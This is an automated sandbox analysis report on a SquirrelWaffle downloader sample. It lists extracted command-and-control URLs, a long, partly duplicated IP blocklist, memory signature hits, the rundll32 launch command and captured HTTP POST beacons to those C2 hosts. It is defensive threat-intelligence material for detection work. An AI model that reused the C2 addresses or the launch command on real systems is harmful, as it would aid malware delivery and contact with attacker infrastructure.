squirrelwaffle | 27fe65cd73ff1a6419ec3fd67afae07f0bbdbc241d43faa7f9257d27f93c5bf2

General

Target

www2.bin.dll

Score

10^/10

squirrelwaffle downloader

Malware Config

Extracted

Family

squirrelwaffle

C2

spiritofprespa.com/9783Tci2SGF6

amjsys.com/RIZszf8vR

hrms.prodigygroupindia.com/SKyufGZV

centralfloridaasphalt.com/GCN0FChS

jhehosting.com/rUuKheB7

shoeclearanceoutlet.co.uk/46awDTJjI4l

kmslogistik.com/aS1mjTkJIy

bartek-lenart.pl/1bWJ57V9vx

voip.voipcallhub.com/ZVmfdGHs4T

mercyfoundationcio.org/XF9aQrXnakeG

key4net.com/a8A2kcc1J

chaturanga.groopy.com/mxN3lxZoVApc

voipcallhub.com/ilGht5r26

ems.prodigygroupindia.com/v5RvVJTz

novamarketing.com.pk/k8l36uus

lenartsa.webd.pro/fz16DjmKmHtl

lead.jhinfotech.co/YERjiAMaupaz

Attributes

blocklist
94.46.179.80

206.189.205.251

88.242.66.45

85.75.110.214

87.104.3.136

207.244.91.171

49.230.88.160

91.149.252.75

91.149.252.88

92.211.109.152

178.0.250.168

88.69.16.230

95.223.77.160

99.234.62.23

2.206.105.223

84.222.8.201

89.183.239.142

5.146.132.101

77.7.60.154

45.41.106.122

45.74.72.13

74.58.152.123

88.87.68.197

211.107.25.121

109.70.100.25

185.67.82.114

207.102.138.19

204.101.161.14

193.128.108.251

111.7.100.17

111.7.100.16

74.125.210.62

74.125.210.36

104.244.74.57

185.220.101.145

185.220.101.144

185.220.101.18

185.220.100.246

185.220.101.228

185.220.100.243

185.220.101.229

185.220.101.147

185.220.102.250

185.220.100.241

199.195.251.84

213.164.204.94

74.125.213.7

74.125.213.9

185.220.100.249

37.71.173.58

93.2.220.100

188.10.191.109

81.36.17.247

70.28.47.118

45.133.172.222

108.41.227.196

37.235.53.46

162.216.47.22

154.3.42.51

45.86.200.60

212.230.181.152

185.192.70.11

14.33.131.72

94.46.179.80

206.189.205.251

178.255.172.194

84.221.205.40

155.138.242.103

178.212.98.156

85.65.32.191

31.167.184.201

88.242.66.45

36.65.102.42

203.213.127.79

85.75.110.214

93.78.214.187

204.152.81.185

183.171.72.218

168.194.101.130

87.104.3.136

92.211.196.33

197.92.140.125

207.244.91.171

49.230.88.160

196.74.16.153

91.149.252.75

91.149.252.88

92.206.15.202

82.21.114.63

92.211.109.152

178.0.250.168

178.203.145.135

85.210.36.4

199.83.207.72

86.132.134.203

88.69.16.230

99.247.129.88

37.201.195.12

87.140.192.0

88.152.185.188

87.156.177.91

99.229.57.160

95.223.77.160

88.130.54.214

99.234.62.23

2.206.105.223

94.134.179.130

84.221.255.199

84.222.8.201

89.183.239.142

87.158.21.26

93.206.148.216

5.146.132.101

77.7.60.154

95.223.75.85

162.254.173.187

50.99.254.163

45.41.106.122

99.237.13.3

45.74.72.13

108.171.64.202

74.58.152.123

216.209.253.121

88.87.68.197

211.107.25.121

109.70.100.25

185.67.82.114

207.102.138.19

204.101.161.14

193.128.108.251

111.7.100.17

111.7.100.16

74.125.210.62

74.125.210.36

104.244.74.57

185.220.101.145

185.220.101.144

185.220.101.18

185.220.100.246

185.220.101.228

185.220.100.243

185.220.101.229

185.220.101.147

185.220.102.250

Signatures

SquirrelWaffle is a simple downloader written in C++.
SquirrelWaffle.
downloader squirrelwaffle

squirrelwaffle 2 IoCs

Squirrelwaffle Payload

resource	yara_rule
behavioral2/memory/1108-116-0x0000000073F10000-0x0000000073F72000-memory.dmp	squirrelwaffle
behavioral2/memory/1108-115-0x0000000073F10000-0x0000000073F21000-memory.dmp	squirrelwaffle

Blocklisted process makes network request 5 IoCs

flow	pid	Process
9	1108	rundll32.exe
12	1108	rundll32.exe
15	1108	rundll32.exe
16	1108	rundll32.exe
17	1108	rundll32.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 856 wrote to memory of 1108	856	rundll32.exe	68
PID 856 wrote to memory of 1108	856	rundll32.exe	68
PID 856 wrote to memory of 1108	856	rundll32.exe	68

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\www2.bin.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:856
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\www2.bin.dll,#1
  2⤵
  - Blocklisted process makes network request
  PID:1108

Network

DNS

lead.jhinfotech.co

rundll32.exe

Remote address:

8.8.8.8:53

Request

lead.jhinfotech.co

IN A

Response

lead.jhinfotech.co

IN A

166.62.28.139
POST

http://lead.jhinfotech.co/YERjiAMaupaz/OQsaDixzHTgtfjMcGypGenplfX9lemV9fQ==

rundll32.exe

Remote address:

166.62.28.139:80

Request

POST /YERjiAMaupaz/OQsaDixzHTgtfjMcGypGenplfX9lemV9fQ== HTTP/1.1
Host: lead.jhinfotech.co
Content-Length: 80

Response

HTTP/1.1 200 OK

Date: Thu, 16 Sep 2021 14:46:44 GMT
Server: Apache
X-Powered-By: PHP/7.3.29
Upgrade: h2,h2c
Connection: Upgrade
Vary: Accept-Encoding,User-Agent
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

spiritofprespa.com

rundll32.exe

Remote address:

8.8.8.8:53

Request

spiritofprespa.com

IN A

Response

spiritofprespa.com

IN A

160.153.131.187
POST

http://spiritofprespa.com/9783Tci2SGF6/ASk5Kx0SPR8lJjE5eTg9GkN6fGF6emV8YXp4

rundll32.exe

Remote address:

160.153.131.187:80

Request

POST /9783Tci2SGF6/ASk5Kx0SPR8lJjE5eTg9GkN6fGF6emV8YXp4 HTTP/1.1
Host: spiritofprespa.com
Content-Length: 80

Response

HTTP/1.1 200 OK

Date: Thu, 16 Sep 2021 14:47:09 GMT
Server: Apache
X-Powered-By: PHP/5.6.40
Upgrade: h2,h2c
Connection: Upgrade
Content-Length: 262
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
POST

http://spiritofprespa.com/9783Tci2SGF6/fXMKNg0nKzN/DA15DggBI0N6fGF6emV8YXp4

rundll32.exe

Remote address:

160.153.131.187:80

Request

POST /9783Tci2SGF6/fXMKNg0nKzN/DA15DggBI0N6fGF6emV8YXp4 HTTP/1.1
Host: spiritofprespa.com
Content-Length: 80

Response

HTTP/1.1 200 OK

Date: Thu, 16 Sep 2021 14:47:33 GMT
Server: Apache
X-Powered-By: PHP/5.6.40
Upgrade: h2,h2c
Connection: Upgrade
Content-Length: 262
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
POST

http://spiritofprespa.com/9783Tci2SGF6/eDkkAA0bInx9Rnp6ZX1/ZXplfX0=

rundll32.exe

Remote address:

160.153.131.187:80

Request

POST /9783Tci2SGF6/eDkkAA0bInx9Rnp6ZX1/ZXplfX0= HTTP/1.1
Host: spiritofprespa.com
Content-Length: 80

Response

HTTP/1.1 200 OK

Date: Thu, 16 Sep 2021 14:47:58 GMT
Server: Apache
X-Powered-By: PHP/5.6.40
Upgrade: h2,h2c
Connection: Upgrade
Content-Length: 262
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
POST

http://spiritofprespa.com/9783Tci2SGF6/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfntkenxhe2R6fg==

rundll32.exe

Remote address:

160.153.131.187:80

Request

POST /9783Tci2SGF6/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfntkenxhe2R6fg== HTTP/1.1
Host: spiritofprespa.com
Content-Length: 80

Response

HTTP/1.1 200 OK

Date: Thu, 16 Sep 2021 14:48:22 GMT
Server: Apache
X-Powered-By: PHP/5.6.40
Upgrade: h2,h2c
Connection: Upgrade
Content-Length: 262
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8

166.62.28.139:80

http://lead.jhinfotech.co/YERjiAMaupaz/OQsaDixzHTgtfjMcGypGenplfX9lemV9fQ==

http

rundll32.exe

428 B
729 B
5
5

HTTP Request

POST http://lead.jhinfotech.co/YERjiAMaupaz/OQsaDixzHTgtfjMcGypGenplfX9lemV9fQ==

HTTP Response

200
160.153.131.187:80

http://spiritofprespa.com/9783Tci2SGF6/ASk5Kx0SPR8lJjE5eTg9GkN6fGF6emV8YXp4

http

rundll32.exe

428 B
705 B
5
5

HTTP Request

POST http://spiritofprespa.com/9783Tci2SGF6/ASk5Kx0SPR8lJjE5eTg9GkN6fGF6emV8YXp4

HTTP Response

200
160.153.131.187:80

http://spiritofprespa.com/9783Tci2SGF6/fXMKNg0nKzN/DA15DggBI0N6fGF6emV8YXp4

http

rundll32.exe

428 B
705 B
5
5

HTTP Request

POST http://spiritofprespa.com/9783Tci2SGF6/fXMKNg0nKzN/DA15DggBI0N6fGF6emV8YXp4

HTTP Response

200
160.153.131.187:80

http://spiritofprespa.com/9783Tci2SGF6/eDkkAA0bInx9Rnp6ZX1/ZXplfX0=

http

rundll32.exe

420 B
705 B
5
5

HTTP Request

POST http://spiritofprespa.com/9783Tci2SGF6/eDkkAA0bInx9Rnp6ZX1/ZXplfX0=

HTTP Response

200
160.153.131.187:80

http://spiritofprespa.com/9783Tci2SGF6/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfntkenxhe2R6fg==

http

rundll32.exe

440 B
705 B
5
5

HTTP Request

POST http://spiritofprespa.com/9783Tci2SGF6/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfntkenxhe2R6fg==

HTTP Response

200

8.8.8.8:53

lead.jhinfotech.co

dns

rundll32.exe

64 B
80 B
1
1

DNS Request

lead.jhinfotech.co

DNS Response

166.62.28.139
8.8.8.8:53

spiritofprespa.com

dns

rundll32.exe

64 B
80 B
1
1

DNS Request

spiritofprespa.com

DNS Response

160.153.131.187

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1108-116-0x0000000073F10000-0x0000000073F72000-memory.dmp

Filesize
392KB

Download
memory/1108-115-0x0000000073F10000-0x0000000073F21000-memory.dmp

Filesize
68KB

Download
memory/1108-117-0x0000000000930000-0x0000000000931000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.